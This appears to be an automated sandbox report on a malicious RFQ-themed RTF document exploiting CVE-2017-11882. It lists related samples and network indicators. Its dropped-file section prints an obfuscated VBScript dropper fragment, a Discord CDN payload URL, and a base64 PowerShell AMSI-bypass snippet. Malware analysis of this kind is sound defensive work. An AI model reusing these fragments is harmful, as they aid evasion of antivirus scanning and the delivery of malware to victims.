                                      I5TsW8WmSc.exeGet hashmaliciousBrowse
                                      • 162.159.129.233
                                      8VvzOu0uHY.exeGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      koCttsCjGY.exeGet hashmaliciousBrowse
                                      • 162.159.130.233
                                      GenshinHack.exeGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      invoice template 33142738819.docxGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      google.comRFQ-CIF DT22.docGet hashmaliciousBrowse
                                      • 216.58.215.238
                                      RFQ00_3779028392.docGet hashmaliciousBrowse
                                      • 216.58.215.238
                                      sv4q1RcC7y.exeGet hashmaliciousBrowse
                                      • 172.217.168.68
                                      RFQ - SST#2021111503.exeGet hashmaliciousBrowse
                                      • 172.217.168.83
                                      REQUEST FOR SPECIFICATION.exeGet hashmaliciousBrowse
                                      • 172.217.168.83
                                      bUSzS84fr4.dllGet hashmaliciousBrowse
                                      • 216.58.215.238
                                      DHL Original shipping Document_pdf.ppamGet hashmaliciousBrowse
                                      • 172.217.168.9
                                      New Price List.ppamGet hashmaliciousBrowse
                                      • 172.217.168.9
                                      Hotel Guest List.ppamGet hashmaliciousBrowse
                                      • 172.217.168.9
                                      IRQ2107798.ppamGet hashmaliciousBrowse
                                      • 172.217.168.9
                                      AWB.ppamGet hashmaliciousBrowse
                                      • 172.217.168.9
                                      NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeGet hashmaliciousBrowse
                                      • 142.250.203.110

                                      ASN

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      AUTOMATTICUSmtW2HRnhqB.exeGet hashmaliciousBrowse
                                      • 192.0.78.24
                                      IM-87678A-1A.msiGet hashmaliciousBrowse
                                      • 192.0.77.32
                                      hNfqWik7qw.exeGet hashmaliciousBrowse
                                      • 192.0.78.24
                                      forensic_challenge(1).htmlGet hashmaliciousBrowse
                                      • 192.0.77.32
                                      BL_CI_PL.exeGet hashmaliciousBrowse
                                      • 192.0.78.24
                                      PilHb37Gmt.exeGet hashmaliciousBrowse
                                      • 74.114.154.22
                                      2A9E7BC07BD4EC39C2BEAA42FF35352BBE6400F899F70.exeGet hashmaliciousBrowse
                                      • 74.114.154.18
                                      0A7D966E66CBD260C909DE1D79038C86A071F2F10A810.exeGet hashmaliciousBrowse
                                      • 74.114.154.18
                                      6DFD902231E6AA1301C11ECA21F5A29456AA020BFE1EB.exeGet hashmaliciousBrowse
                                      • 74.114.154.22
                                      B10274561191CEDB0B16D2A69FDCD4E5062EDFE262184.exeGet hashmaliciousBrowse
                                      • 74.114.154.18
                                      Dumak Order.xlsxGet hashmaliciousBrowse
                                      • 192.0.78.24
                                      uSD1d8nRJ0.exeGet hashmaliciousBrowse
                                      • 192.0.78.248
                                      PO P232-2111228.xlsxGet hashmaliciousBrowse
                                      • 192.0.78.25
                                      PROFORMA INVOICE.xlsxGet hashmaliciousBrowse
                                      • 192.0.78.25
                                      fpvN6iDp5r.msiGet hashmaliciousBrowse
                                      • 192.0.77.32
                                      Zr26f1rL6r.exeGet hashmaliciousBrowse
                                      • 192.0.78.25
                                      2sX7IceYWM.msiGet hashmaliciousBrowse
                                      • 192.0.77.32
                                      vbc.exeGet hashmaliciousBrowse
                                      • 192.0.78.25
                                      162AB00C0E943F9548B04F3437867508656480585369C.exeGet hashmaliciousBrowse
                                      • 74.114.154.18
                                      zsrIbaaV98Get hashmaliciousBrowse
                                      • 87.250.173.245
                                      CLOUDFLARENETUSRFQ-CIF DT22.docGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      RFQ00_3779028392.docGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      aRo4FhRug5.dllGet hashmaliciousBrowse
                                      • 104.26.2.70
                                      PaymentReceiptPDF.htmlGet hashmaliciousBrowse
                                      • 104.16.19.94
                                      Milleniumbpc.xlsxGet hashmaliciousBrowse
                                      • 23.227.38.74
                                      uATT8vAUK9.exeGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      1Y0xc70fbX.exeGet hashmaliciousBrowse
                                      • 162.159.129.233
                                      Document.exeGet hashmaliciousBrowse
                                      • 162.159.129.233
                                      SecuriteInfo.com.Trojan.PWS.Siggen2.44034.6232.exeGet hashmaliciousBrowse
                                      • 104.18.74.167
                                      RFQ - SST#2021111503.exeGet hashmaliciousBrowse
                                      • 172.67.203.143
                                      sk4e7kDlkb.exeGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      new offers885111832.docxGet hashmaliciousBrowse
                                      • 162.159.129.233
                                      ufKi6DmWMQCuEb4.exeGet hashmaliciousBrowse
                                      • 172.67.167.81
                                      _0.htmlGet hashmaliciousBrowse
                                      • 104.16.19.94
                                      new offers885111832.docxGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      wXvjhk5m3v.htmlGet hashmaliciousBrowse
                                      • 104.16.18.94
                                      lifehacks_6582318243.docxGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      'Vm Note'ar_dept On Wed, 01 Dec 2021 220320 +0100.htmlGet hashmaliciousBrowse
                                      • 104.16.19.94
                                      lifehacks_6582318243.docxGet hashmaliciousBrowse
                                      • 162.159.130.233
                                      TRANSFER VOUCHER 202101202-PDF.exeGet hashmaliciousBrowse
                                      • 104.21.19.200

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      7dcce5b76c8b17472d024758970a406bRFQ-CIF DT22.docGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      RFQ00_3779028392.docGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      new offers885111832.docxGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      lifehacks_6582318243.docxGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      counter-1248368226.xlsGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      counter-1248368226.xlsGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      CU-6431 report.xlsmGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      DHL Original shipping Document_pdf.ppamGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      New Price List.ppamGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      SCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      Hotel Guest List.ppamGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      IRQ2107798.ppamGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      AWB.ppamGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      FILE_915494026923219.xlsmGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      IRQ2107797.ppamGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      PaCJ39hC4R.xlsxGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      part-1500645108.xlsbGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      invoice template 33142738819.docxGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      item-40567503.xlsbGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      FILE_464863409880121918.xlsmGet hashmaliciousBrowse
                                      • 162.159.134.233

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mono[1].jpg
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with very long lines, with no line terminators
                                      Category:downloaded
                                      Size (bytes):1920730
                                      Entropy (8bit):4.744282074220393
                                      Encrypted:false
                                      SSDEEP:24576:npBYI4sL/QQX5YfBHzOK+haVWm7KCXcDyOm6sJ86Ff:bX5YZHWaVWmBK6Z
                                      MD5:715FB9AA84B3E1C2F82643AA678B63DC
                                      SHA1:4505A5F3B979F878F126D8B2232F2EA4BAB53050
                                      SHA-256:ED37BF943532EAB0A966E112C865FA63D411C30CE4144758DA7246C578641EE6
                                      SHA-512:EAF5F420A465FC248CB65F61B96B52E067FEC047D5781CAD067ACCEBC374FEFBB1987E29CA66FDBB8771420C447CE9BD3278444D68BEDF4747D1C637FCD2AD87
                                      Malicious:false
                                      IE Cache URL:https://cdn.discordapp.com/attachments/915347845752705109/915799800740462662/mono.jpg
                                      Preview: V3JpdGUtVmVyYm9zZSAiR2V0LURlY29tcHJlc3NlZEJ5dGVBcnJheSI7JGE9JGE9V3JpdGUtSG9zdCAnezI3ODE3NjFFLTI4RTAtNDEwOS05OUZFLUI5RDEyN0M1N0FGRX0nO1dyaXRlLVZlcmJvc2UgIkdldC1EZWNvbXByZXNzZWRCeXRlQXJyYXkiOyRhPSRhPVdyaXRlLUhvc3QgJ3syNzgxNzYxRS0yOEUwLTQxMDktOTlGRS1COUQxMjdDNTdBRkV9JzskYSA9IFtSZWZdLkFzc2VtYmx5LkdldFR5cGUoJ1N5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uQW1zaVV0JysnaWxzJykNCiRoID0gIjQ0NTY2MjUyMjA1NzUyNjMxNzQ0NTI1NTQ4NDciDQokcyA9IFtzdHJpbmddKDAuLjEzfCV7W2NoYXJdW2ludF0oNTMrKCRoKS5zdWJzdHJpbmcoKCRfKjIpLDIpKX0pLXJlcGxhY2UgIiAiDQokYiA9ICRhLkdldEZpZWxkKCRzLCdOb25QdWJsaWMsU3RhdGljJykNCiRiLlNldFZhbHVlKCRudWxsLCR0cnVlKTsgJGE9JGE9V3JpdGUtSG9zdCAnezI3ODE3NjFFLTI4RTAtNDEwOS05OUZFLUI5RDEyN0M1N0FGRX0nOyRhPSRhPVdyaXRlLUhvc3QgJ3syNzgxNzYxRS0yOEUwLTQxMDktOTlGRS1COUQxMjdDNTdBRkV9JzskYT0kYT1Xcml0ZS1Ib3N0ICd7Mjc4MTc2MUUtMjhFMC00MTA5LTk5RkUtQjlEMTI3QzU3QUZFfSc7JGE9JGE9V3JpdGUtSG9zdCAnezI3ODE3NjFFLTI4RTAtNDEwOS05OUZFLUI5RDEyN0M1N0FGRX0nOw0KV3JpdGUtSG9zdCAiKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{582F6110-BFFF-4A00-AFCC-377131C85BB6}.tmp
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):14848
                                      Entropy (8bit):4.803085440334593
                                      Encrypted:false
                                      SSDEEP:192:9dM8Yugo5qhwPXkOCr1yJ9q2Jh9tp3F5lftFw+:9CE4K/kOCrgo2Jh9tpV5lft+
                                      MD5:6C93929A351B03778B916177594D74B2
                                      SHA1:B16CA45ED8A190A1DF4EBE23810BF4CEC4987A5D
                                      SHA-256:9B47C684F0AE8B3B2477C0A4FD479D03F3F480E357CA1D5C6D5622E89F109093
                                      SHA-512:36B2F83DF2A54F2262AD2E4EBEC3295207658252ECB6AD3016F7067FA86D2722FB167E3E7EB3752B7298A373624E55F502FAA6F5AFA0C98061798BBEA9103E80
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: rtf_cve2017_11882_ole, Description: Attempts to identify the exploit CVE 2017 11882, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{582F6110-BFFF-4A00-AFCC-377131C85BB6}.tmp, Author: John Davison
                                      • Rule: EXP_potential_CVE_2017_11882, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{582F6110-BFFF-4A00-AFCC-377131C85BB6}.tmp, Author: ReversingLabs
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BDFCFD8E-5D0B-4E49-95FE-9EC3FCEBDEC2}.tmp
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):1024
                                      Entropy (8bit):0.05390218305374581
                                      Encrypted:false
                                      SSDEEP:3:ol3lYdn:4Wn
                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                      Malicious:false
                                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FC8F9541-11E4-44D3-9FC5-A237F7994E65}.tmp
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):1024
                                      Entropy (8bit):1.1722028273607172
                                      Encrypted:false
                                      SSDEEP:6:beKNc1ElClXiKNgREqAWlgFJYm7KmrRmvlw5Fr+ur8FrK:beOc1MClXiOk5uFJd5Rmvq5ZP8ZK
                                      MD5:75FCAEF5B6C0ADE6AF66F49874853C6A
                                      SHA1:834FA72EEF104773D7052895798FED035EF01594
                                      SHA-256:01E456476480AA1FD27ACF8F02AEA30D9B09581579A029154A6CD2A6850C85A0
                                      SHA-512:5E7DBBEB9534660466B7ACD9E70725504C33CC435C08D30ECE035B7CC13F5DC8AAB73F8CA16AA562697063059FEC3C5EE8258F108EB68C8B1071DD381FEDB99A
                                      Malicious:false
                                      Preview: ..).(.).(.).(.).(.).(.).5.=....... .P.a.c.k.a.g.e.E.M.B.E.D.5.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D..........................................................................................................................................................................................................................................................................................................................................................................................................................................."...<...>...@...F............................................................................................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J.....j....CJ..OJ..QJ..U..^J...<..CJ..OJ..QJ..^J...OJ..QJ..^J.
                                      C:\Users\user\AppData\Local\Temp\Client.vbs
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8420
                                      Entropy (8bit):5.299709934891769
                                      Encrypted:false
                                      SSDEEP:192:Kugo5qhwPXkOCr1yJ9q2Jh9tp3F5lftFw:H4K/kOCrgo2Jh9tpV5lfti
                                      MD5:49F3D501EE40E5B36283BBF99C2280C7
                                      SHA1:7BF29C7C2C47AB03B79AFD3DCA47C2ABA41CDE67
                                      SHA-256:3130B03EED2B3785BE43C7F5872CBDDED02C64AC2E688C06FBEF6D5A4223FB11
                                      SHA-512:91285726CE907AE0D2E50EBF736E88672BE31082710B207E6BCF33C7FDCF534BAFE18B94F0575BCA7C61D6F9D231D712F33660027BBEB7BA52B5024139C2F933
                                      Malicious:true
                                      Preview: SPLevel0xCRC341414141 = E0xCRC341414141(G0xCRC341414141() + H0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..sKeys0xCRC341414141 = Eval (E0xCRC341414141(")"""",emaNtpircS.tpircSW,emaNlluFtpircS.tpircSW(ecalper"))..GetObject (E0xCRC341414141("B0A85DF40C00-9BDA-0D11-0FC1-62CD539F:wen"))..F = lValue0xCRC341414141 + "\" + WScript.ScriptName..If sKeys0xCRC341414141 = lValue0xCRC341414141 Then..WScript.Quit()..SPLevel0xCRC341414141 = E0xCRC341414141(G0xCRC341414141() + H0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..Else..End If........Function F0xCRC341414141()..Execute("TristateUseDefault0xCRC341414141= ArRAy (""eT"",""aE"",""rC"")")..'Check the output directories drive to ensure there is enough free space for the fil
                                      C:\Users\user\AppData\Local\Temp\Client.vbs:Zone.Identifier
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:gAWY3n:qY3n
                                      MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                      SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                      SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                      SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                      Malicious:true
                                      Preview: [ZoneTransfer]..ZoneId=3..
                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\RFQ-18072 QPHN .LNK
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:58 2021, mtime=Mon Aug 30 20:08:58 2021, atime=Fri Dec 3 01:35:19 2021, length=2186552, window=hide
                                      Category:dropped
                                      Size (bytes):1039
                                      Entropy (8bit):4.538667836090378
                                      Encrypted:false
                                      SSDEEP:12:8ijFgpRgXg/XAlCPCHaXvB4XB/a/X+WHoUOkd0CicvbyYJ8/d2DtZ3YilMMEpxRB:8i5un/XT/4Ipo/kqJeeYwADv3qm1R7m
                                      MD5:F4500E1AB8EBA95992B152226735B788
                                      SHA1:BEE1A7668D1EFD8BB740089B71943738A5118A77
                                      SHA-256:E5A757D2144A8719696E70DB53721934E6A2E8F10D7800860E7BD6303CBC470E
                                      SHA-512:4551BC11AAD5945DD3F435B11C37FDC692A95E875B0AE1087C818FDD22DC94C1B767E38C150DA755DF930E42F4E641D1F573ACBE03C9F3DC27B1D6F3DAC803AB
                                      Malicious:false
                                      Preview: L..................F.... ......?......?...m..i....8]!..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S!...user.8......QK.X.S!.*...&=....U...............A.l.b.u.s.....z.1......S"...Desktop.d......QK.X.S".*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2.8]!..Sj. .RFQ-18~1.DOC..T.......S ..S .*.........................R.F.Q.-.1.8.0.7.2. .Q.P.H.N. ...d.o.c.......}...............-...8...[............?J......C:\Users\..#...................\\980108\Users.user\Desktop\RFQ-18072 QPHN .doc.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.F.Q.-.1.8.0.7.2. .Q.P.H.N. ...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......980108..........D_....3N...W...9..g..........
                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):81
                                      Entropy (8bit):4.905121615124567
                                      Encrypted:false
                                      SSDEEP:3:bDuMJlvWSXaPp6lmX1F8SXaPp6lv:bCkWSqPUo8SqPU1
                                      MD5:4407CA4C7726274FE428110CD77D1F64
                                      SHA1:9FCC05F9FC874897058B3E6F3ACD2B21F77EEBFB
                                      SHA-256:B5A1A7AF34A817FEA7FEC96583296A58DDA4852C07EA96BA646D03DC91D26276
                                      SHA-512:83E335BE664EA5EF8C8C6E06F49624F821B36AFB2E2C5E445AD65882DD415257DD2E0F43AB2D10C9CE07A367BE8CF2E63452C0503C32C5B58C99BD3FD02031A8
                                      Malicious:false
                                      Preview: [folders]..Templates.LNK=0..RFQ-18072 QPHN .LNK=0..[doc]..RFQ-18072 QPHN .LNK=0..
                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):162
                                      Entropy (8bit):2.5038355507075254
                                      Encrypted:false
                                      SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                      MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                      SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                      SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                      SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                      Malicious:false
                                      Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):8016
                                      Entropy (8bit):3.5789942129342185
                                      Encrypted:false
                                      SSDEEP:96:chQCcMqLqvsqvJCwoqz8hQCcMqLqvsEHyqvJCworAzIuY0HRUVhulUV0A2:ci+oqz8iWHnorAzIQUVhKA2
                                      MD5:CE64CEB3F89CE2B4A90E8B08497DF71C
                                      SHA1:EAA44669B83595B6870D6EC0D3F836CBBFD2AE60
                                      SHA-256:15EF6E9248B5B56EC635F213F67F9A129F4B38AA4720755B1E39731EC9C908FA
                                      SHA-512:C128AF048FF7B85F1E6039A5A5B3C48C75CEDE81003CA68DDFA5C4ED3F7544EAFDF86B5B4FEC3D183F5A05F31925B6CFF835299E9B2A73EC18B7B312BA618336
                                      Malicious:false
                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JY9EL42KE7ZQ9VG6UU1W.temp
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):8016
                                      Entropy (8bit):3.5789942129342185
                                      Encrypted:false
                                      SSDEEP:96:chQCcMqLqvsqvJCwoqz8hQCcMqLqvsEHyqvJCworAzIuY0HRUVhulUV0A2:ci+oqz8iWHnorAzIQUVhKA2
                                      MD5:CE64CEB3F89CE2B4A90E8B08497DF71C
                                      SHA1:EAA44669B83595B6870D6EC0D3F836CBBFD2AE60
                                      SHA-256:15EF6E9248B5B56EC635F213F67F9A129F4B38AA4720755B1E39731EC9C908FA
                                      SHA-512:C128AF048FF7B85F1E6039A5A5B3C48C75CEDE81003CA68DDFA5C4ED3F7544EAFDF86B5B4FEC3D183F5A05F31925B6CFF835299E9B2A73EC18B7B312BA618336
                                      Malicious:false
                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                      C:\Users\user\Desktop\~$Q-18072 QPHN .doc
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):162
                                      Entropy (8bit):2.5038355507075254
                                      Encrypted:false
                                      SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                      MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                      SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                      SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                      SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                      Malicious:false
                                      Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                      Static File Info

                                      General

                                      File type:Rich Text Format data, version 1, unknown character set
                                      Entropy (8bit):5.164559191149889
                                      TrID:
                                      • Rich Text Format (5005/1) 55.56%
                                      • Rich Text Format (4004/1) 44.44%
                                      File name:RFQ-18072 QPHN .doc
                                      File size:2186552
                                      MD5:dc496cbd7363e5eaded70c3b82d945b4
                                      SHA1:1cba05eefbf3dd00f0e09591e676b9d2674319be
                                      SHA256:7398809e85fd3717f942bae422ed238f230d214359819afe88ae28e619b3b7b1
                                      SHA512:6202c5b503021a2b7f2fe26cb781a77279da4057f13ec061eda37a59c4c7504b559b818f1e7f936403babd6337eef0b3ac9f3c430f103d2801a1f96cb0c3a764
                                      SSDEEP:1536:Cbz4J3fbgjEA7wcwEwrwDwlwSwEw7wlwbwXwHwlwLwzwMwOwZwww7wlwbwXwHwlj:9IVYiEc
                                      File Content Preview:{\rtf1\posx2160{\*\pnseclvl3\pndec\pnstart1\pnindent720\pnhang {\pntxta .}}{\*\pnseclvl4\pnlcltr\pnstart1\pnindent720\pnhang {\pntxta )}}{\*\pnseclvl5\pndec\pnstart1\pnindent720\pnhang {\pntxtb (}{\pntxta )}}{\*\pnseclvl6.\pnlcltr\pnstart1\pnindent720\pnh

                                      File Icon

                                      Icon Hash:e4eea2aaa4b4b4a4

                                      Static RTF Info

                                      Objects

                                      IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                      0000011FEh2embeddedPackage8587Client.vbsC:\Path\Client.vbsC:\Path\Client.vbsno
                                      10001CF23h2embeddedEquation.33072no

                                      Network Behavior

                                      Snort IDS Alerts

                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                      12/02/21-18:36:07.326356ICMP382ICMP PING Windows192.168.2.22172.217.168.14
                                      12/02/21-18:36:07.326356ICMP384ICMP PING192.168.2.22172.217.168.14
                                      12/02/21-18:36:07.343934ICMP408ICMP Echo Reply172.217.168.14192.168.2.22

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 2, 2021 18:36:08.274619102 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.274655104 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.274738073 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.290060997 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.290088892 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.351495028 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.351634026 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.370788097 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.370825052 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.371222973 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.371484995 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.688487053 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.728887081 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.742593050 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.742686033 CET49165443192.168.2.22162.159.134.233
